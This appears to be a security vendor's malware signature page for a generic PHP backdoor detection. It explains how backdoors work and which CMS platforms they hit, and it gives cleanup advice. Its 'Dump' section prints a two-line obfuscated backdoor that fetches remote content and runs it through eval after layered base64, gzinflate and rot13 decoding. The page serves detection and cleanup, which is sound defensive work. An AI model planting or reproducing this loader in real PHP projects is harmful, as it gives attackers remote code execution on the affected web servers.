Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.backdoor.generic.003.03

php.backdoor.generic.003.03

Backdoors are pieces of code that allow attackers to bypass authentication, maintain their access to the server and reinfect files. Some of those malicious files can be as simple as a single line of code, allowing the execution of remote code, or complex algorithms, providing different functions to the attacker.

This is generic detection of various backdoor components and parts.

Affecting

Any PHP based web site (often through outdated WordPress, Joomla, osCommerce, Magento, Drupal and stolen passwords).

Cleanup

Cleanup is done by deleting the malicious file, which can be found in your system by searching for the dump code below inside your files. Reviewing access logs for non-expected HTTP POSTs can point out the possible infected files.
You can also sign up with us and let our team remove the malware for you.

Dump

$hiddenymouz = file_get_contents($url);
eval (gzinflate(str_rot13(base64_decode(str_rot13(gzinflate(base64_decode($hiddenymouz)))))));